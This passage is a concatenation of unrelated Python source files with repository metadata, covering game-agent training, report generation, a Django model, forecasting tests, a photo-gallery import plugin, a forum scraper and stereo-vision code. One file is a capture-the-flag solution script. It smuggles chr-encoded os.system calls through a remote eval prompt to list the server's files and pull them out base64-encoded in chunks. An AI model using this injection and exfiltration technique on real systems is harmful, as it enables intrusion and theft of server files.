moves = data["move_score"] # список очков
perfect_score = max(moves) # определяем максимальное значение в списке очков
perfect_moves = [i for i in range(7) if moves[i] == perfect_score] # выбираем 7 лучших
if agent_move in perfect_moves:
perfect_move_count += 1 # подсчет идеальных ходов
print('perfect_move_count', perfect_move_count)
print('Определяем победа\пройгрыш\ничья - ', win_loss_draw(moves[agent_move]))
if win_loss_draw(moves[agent_move]) == win_loss_draw(perfect_score):
good_move_count += 1 # подсчет хороших ходов
print('good_move_count', good_move_count)
return (perfect_move_count, good_move_count)
def _executeEpisode(self): # функция одной игры
"""
Эта функция выполняет один эпизод самостоятельной игры, начиная с игрока 1.
По ходу игры каждый ход добавляется в качестве обучающего примера к
trainExamples. Игра длится до конца. После игры
заканчивается, результат игры используется для присвоения значений каждому примеру
в поезде Примеры.
Он использует temp = 1, если episodeStep <tempThresholdStep, и после этого
использует temp = 0.
Возврат:
trainExamples: список примеров формы (canonicalBoard, currPlayer, pi, v)
pi - вектор политики, проинформированный MCTS, v - +1, если
игрок в конце концов выиграл игру, иначе -1.
"""
print('Эпизод одной игры')
trainExamples = []
board = self.game.getInitBoard()
self.curPlayer = 1
episodeStep = 0
while True:
episodeStep += 1
print('Самостоятельная игра агентов текущего поколения и предыдущего, ход = ', episodeStep)
canonicalBoard = self.game.getCanonicalForm(board, self.curPlayer)
temp = int(episodeStep < self.args.tempThresholdStep)
pi = self.current_mcts.getActionProb(canonicalBoard, temp=temp)
sym = self.game.getSymmetries(canonicalBoard, pi)
for b, p in sym: # board, pi
trainExamples.append([b, self.curPlayer, p, None])
action = np.random.choice(len(pi), p=pi)
board, self.curPlayer = self.game.getNextState(
board, self.curPlayer, action)
r = self.game.getGameEnded(board, self.curPlayer)
if r != 0:
return [(x[0], x[2], r * ((-1)**(x[1] != self.curPlayer)))
for x in trainExamples]
| 2.125 | 2 |
spar_python/report_generation/ta1/ta1_section_performance_percentiles.py | nathanawmk/SPARTA | 37 | 46468 | # *****************************************************************
# Copyright 2013 MIT Lincoln Laboratory
# Project: SPAR
# Authors: SY
# Description: Section class
#
#
# Modifications:
# Date Name Modification
# ---- ---- ------------
# 19 Sep 2013 SY Original version
# *****************************************************************
# SPAR imports:
import spar_python.report_generation.ta1.ta1_section as section
import spar_python.report_generation.common.regression as regression
import spar_python.report_generation.common.latex_classes as latex_classes
import spar_python.report_generation.ta1.ta1_schema as t1s
import spar_python.report_generation.ta1.ta1_analysis_percentiles as percentiles
import spar_python.report_generation.ta1.ta1_analysis_input as t1ai
class Ta1PercentilesSection(section.Ta1Section):
"""The percentiles section of the TA1 report"""
def _store_query_percentiles_table(self):
"""Stores the LaTeX string representing the query percentiles table
on the output object."""
constraint_list = self._config.get_constraint_list(
require_correct=True)
categories = self._config.results_db.get_unique_query_values(
simple_fields=[(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),
(t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),
(t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),
(t1s.DBF_TABLENAME, t1s.DBF_CAT)],
constraint_list=constraint_list)
# create the percentiles table:
caption = "Number of Percentiles passing the $%s+%sx$ requirement" % (
str(self._config.a_req), str(self._config.b_req))
percentiles_table = latex_classes.LatexTable(
caption, "perc_main",
["DBNR", "DBRS", "Select", "Query Type", "Num Passing $\%$iles"])
# compute number of percentiles met for every query category:
for (dbnr, dbrs, selection_cols, query_cat) in categories:
inp = t1ai.Input()
inp[t1s.DBF_CAT] = query_cat
inp[t1s.DBF_NUMRECORDS] = dbnr
inp[t1s.DBF_RECORDSIZE] = dbrs
inp[t1s.DBP_SELECTIONCOLS] = selection_cols
performer_constraint_list = self._config.get_constraint_list(
usebaseline=False) + inp.get_constraint_list()
baseline_constraint_list = self._config.get_constraint_list(
usebaseline=True) + inp.get_constraint_list()
percentile_getter = percentiles.Ta1PercentileGetter(
self._config.results_db, performer_constraint_list,
baseline_constraint_list)
if percentile_getter.has_values():
all_met = percentile_getter.get_all_met(
self._config.a_req, self._config.b_req)
percentiles_table.add_content([
inp.test_db.get_db_num_records_str(),
inp.test_db.get_db_record_size_str(), selection_cols,
query_cat, len(all_met)])
self._outp["query_percentiles_table"] = percentiles_table.get_string()
def _populate_output(self):
"""Populates the output object which is passed to the Jinja tempalte
in get_string."""
self._store_query_percentiles_table()
| 1.65625 | 2 |
apps/common/behaviors/uploadable.py | yudame/prakti-api | 0 | 46596 | import json
import uuid
from jsonfield import JSONField
from django.db import models
class Uploadable(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
url = models.URLField(default="")
meta_data = JSONField(blank=True, null=True)
class Meta:
abstract = True
# MODEL PROPERTIES
@property
def file_type(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
try:
return self.meta_data.get('type', "") if self.meta_data else ""
except:
return ""
@property
def name(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
return self.meta_data.get('name', "") if self.meta_data else ""
@property
def file_extension(self):
if self.meta_data and isinstance(self.meta_data, str):
self.meta_data = json.loads(self.meta_data)
return self.meta_data.get('ext', "") if self.meta_data else ""
@property
def link_title(self):
if self.name:
title = self.name
elif 'etc' in self.meta_data:
title = (self.meta_data['etc'] or "").upper()
else:
title = (self.meta_data['type'] or
"").upper() if 'type' in self.meta_data else ""
if 'ext' in self.meta_data:
title = title + " .%s" % (self.meta_data['ext'] or "").upper()
return title
| 1.554688 | 2 |
tests/test_analysis/test_plotters.py | martins0n/etna | 326 | 46724 | import numpy as np
import pandas as pd
import pytest
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import TheilSenRegressor
from etna.analysis import get_residuals
from etna.analysis import plot_residuals
from etna.analysis import plot_trend
from etna.analysis.plotters import _get_labels_names
from etna.datasets import TSDataset
from etna.metrics import MAE
from etna.models import LinearPerSegmentModel
from etna.pipeline import Pipeline
from etna.transforms import BinsegTrendTransform
from etna.transforms import LagTransform
from etna.transforms import LinearTrendTransform
from etna.transforms import STLTransform
from etna.transforms import TheilSenTrendTransform
@pytest.fixture
def residuals():
timestamp = pd.date_range("2020-01-01", periods=100, freq="D")
df = pd.DataFrame(
{
"timestamp": timestamp.tolist() * 2,
"segment": ["segment_0"] * len(timestamp) + ["segment_1"] * len(timestamp),
"target": np.arange(len(timestamp)).tolist() + (np.arange(len(timestamp)) + 1).tolist(),
}
)
df_wide = TSDataset.to_dataset(df)
ts = TSDataset(df=df_wide, freq="D")
forecast_df = ts[timestamp[10:], :, :]
forecast_df.loc[:, pd.IndexSlice["segment_0", "target"]] = -1
forecast_df.loc[:, pd.IndexSlice["segment_1", "target"]] = 1
residuals_df = ts[timestamp[10:], :, :]
residuals_df.loc[:, pd.IndexSlice["segment_0", "target"]] += 1
residuals_df.loc[:, pd.IndexSlice["segment_1", "target"]] -= 1
return residuals_df, forecast_df, ts
def test_get_residuals(residuals):
"""Test that get_residuals finds residuals correctly."""
residuals_df, forecast_df, ts = residuals
actual_residuals = get_residuals(forecast_df=forecast_df, ts=ts)
assert actual_residuals.to_pandas().equals(residuals_df)
def test_get_residuals_not_matching_lengths(residuals):
"""Test that get_residuals fails to find residuals correctly if ts hasn't answers."""
residuals_df, forecast_df, ts = residuals
ts = TSDataset(df=ts[ts.index[:-10], :, :], freq="D")
with pytest.raises(KeyError):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_get_residuals_not_matching_segments(residuals):
"""Test that get_residuals fails to find residuals correctly if segments of dataset and forecast differ."""
residuals_df, forecast_df, ts = residuals
columns_frame = forecast_df.columns.to_frame()
columns_frame["segment"] = ["segment_0", "segment_3"]
forecast_df.columns = pd.MultiIndex.from_frame(columns_frame)
with pytest.raises(KeyError, match="Segments of `ts` and `forecast_df` should be the same"):
_ = get_residuals(forecast_df=forecast_df, ts=ts)
def test_plot_residuals_fails_unkown_feature(example_tsdf):
"""Test that plot_residuals fails if meet unknown feature."""
pipeline = Pipeline(
model=LinearPerSegmentModel(), transforms=[LagTransform(in_column="target", lags=[5, 6, 7])], horizon=5
)
metrics, forecast_df, info = pipeline.backtest(ts=example_tsdf, metrics=[MAE()], n_folds=3)
with pytest.raises(ValueError, match="Given feature isn't present in the dataset"):
plot_residuals(forecast_df=forecast_df, ts=example_tsdf, feature="unkown_feature")
@pytest.mark.parametrize(
"poly_degree, trend_transform_class",
(
[1, LinearTrendTransform],
[2, LinearTrendTransform],
[1, TheilSenTrendTransform],
[2, TheilSenTrendTransform],
),
)
def test_plot_trend(poly_degree, example_tsdf, trend_transform_class):
plot_trend(ts=example_tsdf, trend_transform=trend_transform_class(in_column="target", poly_degree=poly_degree))
@pytest.mark.parametrize("detrend_model", (TheilSenRegressor(), LinearRegression()))
def test_plot_bin_seg(example_tsdf, detrend_model):
plot_trend(ts=example_tsdf, trend_transform=BinsegTrendTransform(in_column="target", detrend_model=detrend_model))
@pytest.mark.parametrize("period", (7, 30))
def test_plot_stl(example_tsdf, period):
plot_trend(ts=example_tsdf, trend_transform=STLTransform(in_column="target", period=period))
@pytest.mark.parametrize(
"poly_degree, expect_values, trend_class",
(
[1, True, LinearTrendTransform],
[2, False, LinearTrendTransform],
[1, True, TheilSenTrendTransform],
[2, False, TheilSenTrendTransform],
),
)
def test_get_labels_names_linear_coeffs(example_tsdf, poly_degree, expect_values, trend_class):
ln_tr = trend_class(in_column="target", poly_degree=poly_degree)
example_tsdf.fit_transform([ln_tr])
segments = example_tsdf.segments
_, linear_coeffs = _get_labels_names([ln_tr], segments)
if expect_values:
assert list(linear_coeffs.values()) != ["", ""]
else:
assert list(linear_coeffs.values()) == ["", ""]
| 1.679688 | 2 |
tests/test_k2.py | LanzLagman/chronos | 0 | 46852 | <filename>tests/test_k2.py
# -*- coding: utf-8 -*-
import pandas as pd
import lightkurve as lk
from chronos.k2 import K2, Everest, K2sff
EPICID = 211916756 # k2-95
CAMPAIGN = 5 # or 18
def test_k2_attributes():
"""
"""
# test inherited attributes
s = K2(epicid=EPICID, campaign=CAMPAIGN)
assert s.epicid is not None
assert s.target_coord is not None
gaia_params = s.query_gaia_dr2_catalog(return_nearest_xmatch=True)
assert isinstance(gaia_params, pd.Series)
tic_params = s.query_tic_catalog(return_nearest_xmatch=True)
assert isinstance(tic_params, pd.Series)
def test_k2_lc_pipeline():
s = K2(epicid=EPICID, campaign=CAMPAIGN)
s.get_lc("sap")
assert isinstance(s.lc_sap, lk.LightCurve)
s.get_lc("pdcsap")
assert isinstance(s.lc_pdcsap, lk.LightCurve)
# def test_k2_lc_custom():
# s = K2(epicid=EPICID, campaign=CAMPAIGN)
# sap = s.make_custom_lc()
def test_k2_tpf():
s = K2(epicid=EPICID, campaign=CAMPAIGN)
tpf = s.get_tpf()
assert isinstance(tpf, lk.targetpixelfile.TargetPixelFile)
def test_everest():
"""
"""
s = Everest(epicid=EPICID, campaign=CAMPAIGN)
assert isinstance(s.lc_everest, lk.LightCurve)
def test_k2sff():
"""
"""
s = K2sff(epicid=EPICID, campaign=CAMPAIGN)
assert isinstance(s.lc_k2sff, lk.LightCurve)
| 1.429688 | 1 |
WebODM-master/plugins/cloudimport/platforms/piwigo.py | abhinavsri000/UAVision | 0 | 46980 | # Check http://piwigo.com/
from urllib.parse import urlparse
from os import path
from plugins.cloudimport.cloud_platform import File, Folder
from plugins.cloudimport.extensions.cloud_library import CloudLibrary
class Platform(CloudLibrary):
def __init__(self):
super().__init__('Piwigo', 'http://{server_url}/index.php?/category/{category_id}')
# Cloud Platform
def platform_file_processing(self, files):
# Piwigo has the concept of physical albums, that basically expose the actual folders in the file system.
# So it might happen that if the File Uploader plugin is used for GCP files, that the files will need to be renamed to store multiple GCP files.
# So basically we are taking any file that contains the string 'gcp_list' and has the extension '.txt' and rename it to 'gcp_list.txt'
return [self._map_gcp_file_if_necessary(file) for file in files]
def get_server_and_folder_id_from_url(self, url):
parse_result = urlparse(url)
paths = parse_result.query.split('/')
if not 'category' in paths or paths.index('category') >= len(paths) - 1:
raise Exception('Wrong URL format')
else:
category_id = paths[paths.index('category') + 1]
path = parse_result.path
if not 'index.php' in path:
raise Exception('Wrong URL format')
path = path[0:path.index('index.php')]
server = parse_result.scheme + '://' + parse_result.netloc + '/' + path
return server, category_id
def build_folder_api_url(self, server_url, folder_id):
return '{server_url}/ws.php?format=json&method=pwg.categories.getList&cat_id={folder_id}&recursive=false'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_folder(self, payload):
result = payload['result']['categories'][0]
return Folder(result['name'], result['url'], result['nb_images'])
def build_list_files_in_folder_api_url(self, server_url, folder_id):
# ToDo: add pagination
return '{server_url}/ws.php?format=json&method=pwg.categories.getImages&cat_id={folder_id}&recursive=false&per_page=500'.format(server_url = server_url, folder_id = folder_id)
def parse_payload_into_files(self, payload):
result = payload['result']
return [File(image['file'], image['element_url']) for image in result['images']]
def _map_gcp_file_if_necessary(self, file):
_, file_extension = path.splitext(file.name)
if file_extension.lower() == ".txt" and 'gcp_list' in file.name:
return File('gcp_list.txt', file.url, file.other)
return file
# Cloud Library
def build_folder_list_api_url(self, server_url):
return '{}/ws.php?format=json&method=pwg.categories.getList&recursive=true&tree_output=true'.format(server_url)
def parse_payload_into_folders(self, payload):
categories = payload['result']
return self._flatten_list([self._build_category(cat) for cat in categories])
def _build_category(self, category):
name = category['name']
images = category['nb_images']
url = category['url']
subcategories = self._flatten_list([self._build_category(subcat) for subcat in category['sub_categories']]) if category['nb_categories'] > 0 else []
for subcategory in subcategories:
subcategory.name = name + ' > ' + subcategory.name
folder = [Folder(name, url, images)] if images > 0 else []
return folder + subcategories
def _flatten_list(self, list_of_lists):
return [item for sublist in list_of_lists for item in sublist]
| 1.53125 | 2 |
mobo/cluster.py | seatonullberg/mobo | 0 | 47108 | from abc import ABC
import numpy as np
from sklearn.cluster import DBSCAN, KMeans
from typing import Callable, Optional, Union
class BaseClusterer(ABC):
"""Abstract base class for Clusterers."""
def __call__(self, data: np.ndarray) -> np.ndarray:
pass
class DbscanClusterer(BaseClusterer):
"""DBSCAN clustering technique.
Args:
Reference:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.DBSCAN.html
"""
def __init__(self,
eps: float = 0.5,
min_samples: int = 5,
metric: Union[str, Callable] = "euclidean",
metric_params: Optional[dict] = None,
algorithm: str = "auto",
leaf_size: int = 30,
p: Optional[float] = None) -> None:
self._clusterer = DBSCAN(eps=eps,
min_samples=min_samples,
metric=metric,
metric_params=metric_params,
algorithm=algorithm,
leaf_size=leaf_size,
p=p,
n_jobs=None)
def __call__(self, data: np.ndarray) -> np.ndarray:
return self._clusterer.fit_predict(data)
class KmeansClusterer(BaseClusterer):
"""KMeans clustering technique.
Args:
Reference:
https://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html
"""
def __init__(self,
n_clusters: int = 8,
init: Union[str, np.ndarray] = "k-means++",
n_init: int = 10,
max_iter: int = 300,
tol: float = 1e-4,
precompute_distances: Union[str, bool] = "auto",
verbose: int = 0,
random_state: Union[int, None] = None,
copy_x: bool = True,
algorithm: str = "auto") -> None:
self._clusterer = KMeans(n_clusters=n_clusters,
init=init,
n_init=n_init,
max_iter=max_iter,
tol=tol,
precompute_distances=precompute_distances,
verbose=verbose,
random_state=random_state,
copy_x=copy_x,
algorithm=algorithm,
n_jobs=None)
def __call__(self, data: np.ndarray) -> np.ndarray:
return self._clusterer.fit_predict(data)
| 2.46875 | 2 |
karborclient/v1/services.py | thuylt2/karborclient | 0 | 47236 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from karborclient.common import base
class Service(base.Resource):
def __repr__(self):
return "<Service %s>" % self._info
class ServiceManager(base.ManagerWithFind):
resource_class = Service
def enable(self, service_id):
"""Enable the service specified by the service ID
:param service_id: The ID of the service to enable.
"""
body = {
'status': 'enabled'
}
return self._update('/os-services/%s' % service_id, body, "service")
def disable(self, service_id):
"""Disable the service specified by the service ID.
:param service_id: The ID of the service to disable.
"""
body = {
'status': 'disabled'
}
return self._update('/os-services/%s' % service_id, body, "service")
def disable_log_reason(self, service_id, reason):
"""Disable the service with a reason.
:param service_id: The ID of the service to disable.
:param reason: The reason for disabling a service.
"""
body = {
'status': 'disabled',
'disabled_reason': reason
}
return self._update("/os-services/%s" % service_id, body, "service")
def list(self, host=None, binary=None):
"""Lists all services."""
search_opts = {
'host': host,
'binary': binary
}
resource_type = "os-services"
url = self._build_list_url(resource_type, search_opts=search_opts)
return self._list(url, 'services')
| 1.65625 | 2 |
XMAS2018/Krampus/solve.py | flawwan/CTF-Writeups | 27 | 47364 | <filename>XMAS2018/Krampus/solve.py
python
from pwn import *
import base64
import sys
def convertstr(convert, debug=False):
if debug:
print convert
output = ""
for i in convert:
output+= "chr(%d)+" % ord(i)
return output[:-1]
if len(sys.argv) == 2 and sys.argv[1] == "local":
r = remote("0.0.0.0",2000)
else:
r = remote("192.168.3.11",14000)
for i in range(5):
r.readuntil("<You>:")
r.sendline("1")
def dump():
payload_search = convertstr("__import__('os').system('find -follow')")
r.sendline("eval(%s)"%payload_search)
r.readuntil("Krampus>: ")
skip = ["./server.jar"]
lines = r.readuntil("You>: ")[:-10].splitlines()
print "Found %d files" % len(lines)
for f in lines:
print "Downloading file %s" % f
if f in skip:
print "Banned file... Skipping"
continue
if os.path.isfile("./minecraft/%s" % f):
print "File already downloaded..."
continue
payloadchunksize = convertstr("__import__('os').system('cat ./%s | base64 -w 0 | wc -c')" % f)
r.sendline("eval(%s)"%payloadchunksize)
r.readuntil("Krampus>: ")
chunk_size = (r.readuntil("You>: ")[:-9])
print "SIZE: %s" % chunk_size
if "Krampus stares back" in chunk_size:
print "Found directory..."
dirpath = "./minecraft/%s" % f
if not os.path.exists(dirpath):
os.mkdir(dirpath)
print "Directory created"
continue
else:
chunk_size = int(chunk_size)
#This is the ugliest code i have ever seen. That's right. I wonder who wrote it
chunk_ = range(1, chunk_size+1)
n = 50000
output = [chunk_[i:i+n] for i in range(0, len(chunk_), n)]
print "Size of file is %d lines" % chunk_size
counter = 1
data = ""
for i in output:
diff = (i[-1]-i[0])+1
print "Processing chunk [%d of %d]" % (counter,chunk_size)
high = counter+diff
payload = convertstr("__import__('os').system('cat %s | base64 -w 0 | cut -c%d-%d && echo stop')" % (f, counter,high))
counter += diff+1
r.sendline("eval(%s)" % payload)
r.readuntil("Krampus>: ")
data += r.readuntil("stop")[:-5]
data = base64.b64decode(data)
with open('minecraft/%s' % f, 'w') as the_file:
the_file.write(data)
dump()
r.close | 1.765625 | 2 |
qtpyvcp/widgets/qtdesigner/stylesheet.py | Lcvette/qtpyvcp | 71 | 47492 | <filename>qtpyvcp/widgets/qtdesigner/stylesheet.py
# Copyright (c) 2017-2018, SLAC National Accelerator Laboratory
# This file has been adapted from PyDM, and can be redistributed and/or
# modified in accordance with terms in conditions set forth in the BSD
# 3-Clause License. You can find the complete licence text in the LICENCES
# directory.
# Links:
# PyDM Project: https://github.com/slaclab/pydm
# PyDM Licence: https://github.com/slaclab/pydm/blob/master/LICENSE.md
""""Utility to handle importing the global stylesheet for QtPyVCP widgets.
"""
import os
from qtpy.QtWidgets import QApplication
# Set up logging
from qtpyvcp.utilities import logger
LOG = logger.getLogger(__name__)
# Fallback global stylesheet if there is no global stylesheet provided via env
# variable or command line parameter
GLOBAL_STYLESHEET = os.path.realpath(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'..',
'default_stylesheet.qss'
)
)
__style_data = None
def clear_cache():
"""Clear the cache for stylesheet data"""
global __style_data
__style_data = None
def apply_stylesheet(stylesheet_file_path=None, widget=None):
"""Apply a stylesheet to the current Qt Designer form (a .ui file).
Args:
stylesheet_file_path (str) : The full path to a global CSS stylesheet file
widget (QWidget) : The widget in which we want to apply the stylesheet.
"""
# Load style data from the stylesheet file. Otherwise, the fallback is
# already in place, i.e. QtPyVCP will be using the data from the global
# stylesheet
style = _get_style_data(stylesheet_file_path)
if not style:
return
if not widget:
widget = QApplication.instance()
widget.setStyleSheet(style)
def _get_style_data(stylesheet_file_path=None):
"""Read the global stylesheet file and provide the style data as a str.
Args:
stylesheet_file_path (str) : The path to the global stylesheet.
Returns:
str : The style data read from the stylesheet file
"""
global __style_data
if not stylesheet_file_path:
stylesheet_file_path = os.getenv("QSS_STYLESHEET", None)
if stylesheet_file_path == "":
stylesheet_file_path = None
if __style_data:
return __style_data
__style_data = None
load_default = True
if stylesheet_file_path is not None:
try:
with open(stylesheet_file_path, 'r') as stylesheet_file:
LOG.info(
"Opening style file '{0}'...".format(stylesheet_file_path))
__style_data = stylesheet_file.read()
load_default = False
except Exception as ex:
__style_data = None
LOG.error(
"Error reading the stylesheet file '{0}'. Exception: {1}".format(
stylesheet_file_path,
str(ex)))
if load_default:
try:
with open(GLOBAL_STYLESHEET, 'r') as default_stylesheet:
LOG.info("Opening the default stylesheet '{0}'...".format(
GLOBAL_STYLESHEET))
__style_data = default_stylesheet.read()
except Exception as ex:
__style_data = None
LOG.exception("Cannot find the default stylesheet file '{0}'.".format(GLOBAL_STYLESHEET))
return __style_data
| 1.289063 | 1 |
packages/conan/recipes/imath/conanfile.py | boberfly/aswf-docker | 3 | 47620 | <gh_stars>1-10
from conans import ConanFile, tools, CMake
import os
required_conan_version = ">=1.38.0"
class ImathConan(ConanFile):
name = "imath"
description = "Imath is a C++ and python library of 2D and 3D vector, matrix, and math operations for computer graphics."
topics = "conan", "imath", "python", "vfx"
homepage = "https://github.com/AcademySoftwareFoundation/Imath"
license = "BSD-3-Clause"
url = "https://github.com/AcademySoftwareFoundation/aswf-docker"
settings = (
"os",
"arch",
"compiler",
"build_type",
"python",
)
generators = "cmake_find_package_multi"
_cmake = None
_source_subfolder = "source_subfolder"
def _is_dummy(self):
return tools.Version(self.version) < "3"
def requirements(self):
if self._is_dummy():
return
self.requires(f"python/(latest)@{self.user}/{self.channel}")
self.requires(f"boost/(latest)@{self.user}/{self.channel}")
def build_requirements(self):
if self._is_dummy():
return
self.build_requires(f"cmake/(latest)@{self.user}/{self.channel}")
def source(self):
if self._is_dummy():
with open("imath-2-is-a-dummy-package.txt", "w") as f:
f.write(
"Imath only contains data starting from version 3. Use OpenEXR-2 for Imath-2"
)
else:
tools.get(
f"https://github.com/AcademySoftwareFoundation/Imath/archive/v{self.version}.tar.gz"
)
os.rename(f"Imath-{self.version}", self._source_subfolder)
def _configure_cmake(self):
if self._cmake:
return self._cmake
with tools.environment_append(tools.RunEnvironment(self).vars):
self._cmake = CMake(self)
self._cmake.definitions["PYTHON"] = "ON"
self._cmake.configure(source_folder=self._source_subfolder)
return self._cmake
def build(self):
if not self._is_dummy():
cmake = self._configure_cmake()
cmake.build()
def package(self):
if self._is_dummy():
self.copy("imath-2-is-a-dummy-package.txt")
else:
self.copy("LICENSE.md", src=self._source_subfolder, dst="licenses")
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
if self._is_dummy():
self.user_info.is_dummy = True
return
self.user_info.is_dummy = False
self.cpp_info.requires.append("python::PythonLibs")
self.cpp_info.requires.append("boost::python")
pymajorminor = self.deps_user_info["python"].python_interp
self.env_info.PYTHONPATH.append(
os.path.join(self.package_folder, "lib", pymajorminor, "site-packages")
)
self.env_info.CMAKE_PREFIX_PATH.append(
os.path.join(self.package_folder, "lib", "cmake")
)
| 1.328125 | 1 |
Dcard.py | funkman56/Dcard | 0 | 47748 | # -*- coding: utf-8 -*-
"""
Created on Mon Jul 1 23:11:03 2019
@author: Relieak
"""
'''
DCARD 熱門前30文章搜尋
純用 BeautifulSoup 寫法
'''
from bs4 import BeautifulSoup
import requests
import re
url = "https://www.dcard.tw/f/"
html = requests.get(url)
html.encoding = "utf-8"
#print(html.text)
sp = BeautifulSoup(html.text,"html.parser")
#print(sp.prettify()) #排版後更容易分析
#data = sp.select(".PostEntry_root_V6g0rd")
data = sp.select(".PostList_entry_1rq5Lf") #若要搜尋標簽中的內容 必須先搜尋上一個標籤 否則會找不到 ex : href 先<div 不能先<a
#print(data[0])
#for link in data[1].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
#
# #print(link)
#
# http = link.get("href")
#
# print("https://www.dcard.tw%s" %(http))
while True :
try :
number = input("~~~歡迎來到Dcard 前30熱門文章搜尋~~~\n""\n你想看第幾則文章(離開 請按Enter)>> ")
if number == "" :
break
elif 0 < int(number) <= 30 :
try :
for i in range(int(number)-1,int(number)) :
data1 = data[i].find_all("h3",{"class" : "Title__Text-v196i6-0 gmfDU"})
data2 = data[i].find_all("div",{"class" : "PostEntry_excerpt_2eHlNn"})
data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"})
data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"})
data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"})
print("")
print("第%d則" %(int(number)))
print("標題 :",data1[0].text)
print("簡介 :",data2[0].text)
print("表達心情數 :",data3[0].text)
# .strip() 方法用於移除字符串頭尾指定的字符(默認為空格或換行符)或字符序列 -->文字<--
print("回應數 :",data4[0].text.strip("回應"))
print("發表時間 :",data5[0].text)
# 搜尋標簽中的內容的方法 #href
for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
http = link.get("href")
#print(http)
#正規表示法
A = re.compile("[0-9]+") #表示任意數字串
B = re.compile("[A-Za-z0-9\./_]+") #表達任意數字,任意英文字母和底線字元的組合,也可寫成 \w
# search(string)的用法是傳回第一組符合正規表示法的字串
Search1 = A.search(http)
Search2 = B.search(http) #去掉網址後面的中文字
#print(Search1)
#print(Search2)
print("文章ID :",Search1.group()) #傳回儲存在match物件中的值 group()
print("網頁 :https://www.dcard.tw%s" %(Search2.group()))
print("")
except :
""" 若文章簡介開頭是 "前情提要" 會搜尋不到內文 "PostEntry_excerpt_2eHlNn" 產生錯誤 須去搜尋 "PostEntry_reply_1oU-6z" """
data2 = data[i].find_all("div",{"class" : "PostEntry_reply_1oU-6z"})
data3 = data[i].find_all("div",{"class" : "ActionBar__LikeCount-pwz3il-1 cGEHtj"})
data4 = data[i].find_all("span",{"class" : "ActionBar__CommentWrapper-pwz3il-5 hkpJwJ"})
data5 = data[i].find_all("span",{"class" : "Header__PublishedDateTime-xvcbwe-3 MDszy"})
print("簡介 :",data2[0].text)
print("表達心情數 :",data3[0].text)
print("回應數 :",data4[0].text.strip("回應"))
print("發表時間 :",data5[0].text)
for link in data[i].find_all("a",{"class" : "PostEntry_root_V6g0rd"}) :
http = link.get("href")
A = re.compile("[0-9]+")
B = re.compile("[A-Za-z0-9\./_]+")
Search1 = A.search(http)
Search2 = B.search(http)
print("文章ID :",Search1.group())
print("網頁 :https://www.dcard.tw%s" %(Search2.group()))
print("")
else :
print("")
print("只能搜尋前30篇文章喔!!")
except :
print("")
print("輸入錯誤請重新輸入!!!")
| 2.046875 | 2 |
src/vision/stereo.py | hb-jones/rp1-ros | 0 | 47876 | <filename>src/vision/stereo.py
from logging import config
import threading, cv2, time, json
from .stereocam import StereoCam
from .vision_config import BallConfig, StereoConfig, MonocularConfig
from . import preprocessing, trajectory_estimation, monocular
class Stereo(monocular.Monocular):
def __init__(self, publisher_func, mode: str = "all", trajectory = None): # mode determines if a trajectory is calculated
self.camera: StereoCam = StereoCam(StereoCam.set_depth_rs_config())
self.publisher_func:function = publisher_func
self.mode = mode
self.trajectory = trajectory
def main_loop(self): #TODO
while self.loop_running:
self.image_id += 1
if self.debug_mode:
self.debug_currrent = True #Tells image saver that it can start saving images
raw_frame, timestamp = self.camera.get_next_depth_image()
preprocessed_frame = self.preprocess(raw_frame)
moment_result = trajectory_estimation.get_target_pixel_position_moment(preprocessed_frame)
if moment_result is False:
#print(f"Invalid Moment: Image {self.image_id}") #Fires if image has no ball
continue
pixel_coords, mass, pixel_diameter = moment_result
if mass<StereoConfig.min_mass:
#print(f"Mass {mass}") #Fires if image is too small
continue
#TODO this should remove incomplete detections
if not (preprocessed_frame[pixel_coords[1],-1] == 0 and preprocessed_frame[pixel_coords[1],0] == 0 and preprocessed_frame[0,pixel_coords[0]] == 0 and preprocessed_frame[-1,pixel_coords[0]] == 0):
print("Incomplete Ball")
continue
#print(pixel_coords)
# draw the center and diameter of the circle
com_frame = cv2.applyColorMap(cv2.convertScaleAbs(raw_frame, alpha=0.03), cv2.COLORMAP_JET)
com_frame = cv2.circle(com_frame,pixel_coords,2,(0,0,255),3)
com_frame = cv2.circle(com_frame,pixel_coords,int(pixel_diameter/2),(0,0,255),3)
self.save_image(com_frame, "com_frame")
if self.mode == "all": #TODO
distance = raw_frame[pixel_coords[1]][pixel_coords[0]]+BallConfig.ball_diameter*1000/2
cartestian_coord_camera_frame = self.camera.get_coord_of_depth_frame_pixel(pixel_coords, distance)
cartestian_coord_world_frame = self.transform_camera_frame_to_world_frame(cartestian_coord_camera_frame)
self.last_update_type = self.mode
self.last_update = time.time()
self.pixel_coords = pixel_coords
self.pixel_diameter = pixel_diameter
self.norm_coords = (0,0)
self.distance = distance
self.cartesian_coords = cartestian_coord_world_frame
coords = cartestian_coord_world_frame
self.coord = {"x":coords[0],"y":coords[1],"z":coords[2], "timestamp":timestamp}
#print(self.distance) #TODO DEBUG
self.publisher_func(self) #TODO call this after updating self
if self.debug_mode and self.debug_type == "oneshot":
self.debug_mode = False
self.debug_currrent = False
self.camera.stop_stream()
def preprocess(self, raw_frame):
#Save raw image
